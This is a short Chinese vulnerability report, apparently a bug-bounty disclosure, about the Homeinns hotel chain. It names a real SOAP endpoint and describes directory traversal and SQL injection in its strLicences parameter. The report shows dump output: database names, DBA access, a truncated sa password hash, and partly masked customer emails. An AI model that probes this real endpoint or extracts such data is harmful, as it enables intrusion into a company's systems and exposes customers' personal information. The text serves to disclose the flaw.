如家最近挺火,也来凑个热闹。漏洞过于明显鉴于厂商隐私安全标题就不写那么明白啦...
## 看域名瞅到
##目录遍历各接口外泄
##down了几个dll反汇编看了下,无果,dll比较敏感相当于源码了
漏洞证明:
#瞄到这块经验告诉我有注入code 区域http://api.homeinns.com/CrsWebSrv_CV2/CrsWebSrv.asmx
果然SOAP协议urn:strLicences参数存在注入,包括莫泰酒店数据code 区域[*] ACT
[*] CRS
[*] CRS_HistoryData
[*] Crs_OrderNo_Builder
[*] HCS
[*] HHotel
[*] homeinns
[*] Hotel
[*] ICRSDB
[*] IVRData
[*] mapbar
[*] master
[*] MDEC
[*] model
[*] MotelHCS
[*] msdb
[*] MT_AgentDB
[*] MT_CRS
[*] MT_Rujia_Transmit
[*] OTA
[*] Rujia_Transmit
[*] tempdb
[*] WebPromotron
DBA权限code 区域[*] sa [1]:password hash:0x0100ffdfb5cb94b23749ebddfeebc5a57a....
count一下homeinns hotelcode 区域+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.hotelinfo | 2242 |
+---------------+---------+
透视下酒店信息,已码code 区域+------------------------+------+
| email | id |
+------------------------+------+
| a...[email protected] | 1 |
| wk...[email protected] | 10 |
| ai....[email protected] | 100 |
| ha....[email protected] | 1000 |
| ric....[email protected] | 1001 |
+------------------------+------+
MT_AgentDB下还有sync数据。
仅测试,就酱。修复方案:
懂...